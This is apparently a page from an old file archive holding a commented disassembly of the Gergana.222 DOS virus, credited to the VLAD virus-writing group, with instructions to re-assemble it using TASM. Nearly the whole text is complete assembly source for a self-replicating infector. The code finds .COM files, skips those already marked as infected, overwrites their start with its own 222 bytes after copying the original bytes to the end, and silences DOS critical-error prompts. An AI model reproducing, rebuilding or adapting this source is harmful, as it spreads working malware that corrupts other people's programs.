home *** CD-ROM | disk | FTP | other *** search
-
- ; Gergana.222
- ; disassembly by Metabolis/VLAD
- ; with a small amount of help from Qark :)
-
- ; I thought it would be interesting since it infects the start of
- ; files whereas most will append.
-
- ; Of course the virus is from Bulgaria, but did you know Gergana
- ; is a female Bulgarian name? ;)
-
- ; use TASM to re-assemble
-
- int24s equ 12h ; original int 24h
- int24o equ 14h ; handler location
- dtapos equ 80h ; DTA position in memory
- fbuffer equ 0FA00h ; 222 byte buffer
- inf_flag equ 0FA46h ; infection flag
- tempdta equ 0FF80h ; Where to store temp DTA
- filename equ 0FF9Eh ; Where the filename is :)
-
- seg_a segment byte public
- assume cs:seg_a, ds:seg_a
-
- org 100h
-
- gerg_222 proc far
-
- start:
- mov ax,flength
- push ax
- mov dx,tempdta ; Temporarily store
- mov ah,1Ah ; DTA at address tempdta
- int 21h ; Set DTA to buffer
- mov cx,20h ; attributes to search for
- mov dx,offset filemask ; '*.COM'
- mov ah,4Eh ; Find 1st file matching the
- int 21h ; above string..
- jc finish_up ; uh oh.. no files!
- mov dx,offset int_24h_entry ; Attach the new error
- mov ax,2524h ; handling procedure to
- int 21h ; int 24h :)
-
- read_virus:
- mov dx,filename ; open file with filename
- mov ax,3D02h ; to read
- int 21h
- jc find_next ; can't open! goto find_next
- xchg bx,ax ; put file handle into BX
- mov cx,0DEh ; read 222 bytes
- mov dx,fbuffer ; into fbuffer
- mov ah,3Fh
- int 21h
- jnc infect ; no error goto infect
- find_next:
- call close_file
- mov ah,4Fh
- int 21h ; find next file!
- jc finish_up ; no files, goto finish_up
- jnc read_virus ; open and read the virus!
-
- gerg_222 endp
-
- close_file proc near
- mov ah,3Eh
- int 21h ; close file with handle
- ; in BX
- retn
- close_file endp
-
- filemask db '*.COM', 00h ; file mask for search
- flength dw 0DEh ; file length
-
- write_virus proc near
- mov ah,40h ; write the virus (222 bytes)
- mov cx,0DEh
- int 21h
- retn
- write_virus endp
-
- infect:
- mov cx,cs:inf_flag
- cmp cx,2E2Ah
- je find_next ; if file infected, find next
- mov ax,4202h
- xor cx,cx ; lseek to the end of the
- xor dx,dx ; file
- int 21h
- cmp ax,0C350h ; if file is bigger than
- ja find_next ; 50000 don't infect
- cmp ax,100h ; if file is smaller than
- jb find_next ; 256 don't infect
- mov flength,ax ; put file length in flength
- mov dx,fbuffer ; point to the file buffer
- call write_virus ; write the 222 bytes which
- ; were originally at the
- ; start of the infected
- ; program
- jc find_next ; no can do, find next!
- mov ax,4200h
- xor cx,cx ; seek to the beginning
- xor dx,dx ; of the file using
- int 21h ; the file handle BX
- mov dx,100h ; from 100h (which is where
- call write_virus ; the virus is)
- jc find_next ; nope, find another file!
- call close_file ; infected! close the file
- finish_up:
- mov dx,cs:int24s ; return the error handling
- mov ax,cs:int24o ; interrupt 24h to its
- mov ds,ax ; previous state
- mov ax,2524h
- int 21h
- push cs
- pop ds
- mov ah,1Ah
- mov dx,dtapos ; set DTA back to original
- int 21h ; position 80h
- mov si,offset execute_original
- mov di,tempdta
- mov cx,30h
- rep movsb ; move 30 bytes from the
- ; execute original code
- ; to the tempdta storage
- jmp $-237h ; jump back 567 bytes to
- ; execute the next part
- ; of the program
-
- execute_original:
-
- pop si ; prolly points to here
- add si,100h ; add start of com address
- mov di,100h ; set destination as 100h.
- mov cx,0deh ; virus length.
- repz movsb ; move original code back.
- mov ax,100h
- jmp ax ; return to original code.
-
- copyright db 'Gergana II -BUL' ; authors signature
-
- int_24h_entry proc far
- xor ax,ax ; Zero register
- iret ; Interrupt return
- int_24h_entry endp
-
- db 90h, 90h,0CDh, 20h ; First 4 bytes of infectee
-
- seg_a ends
-
- end start
-
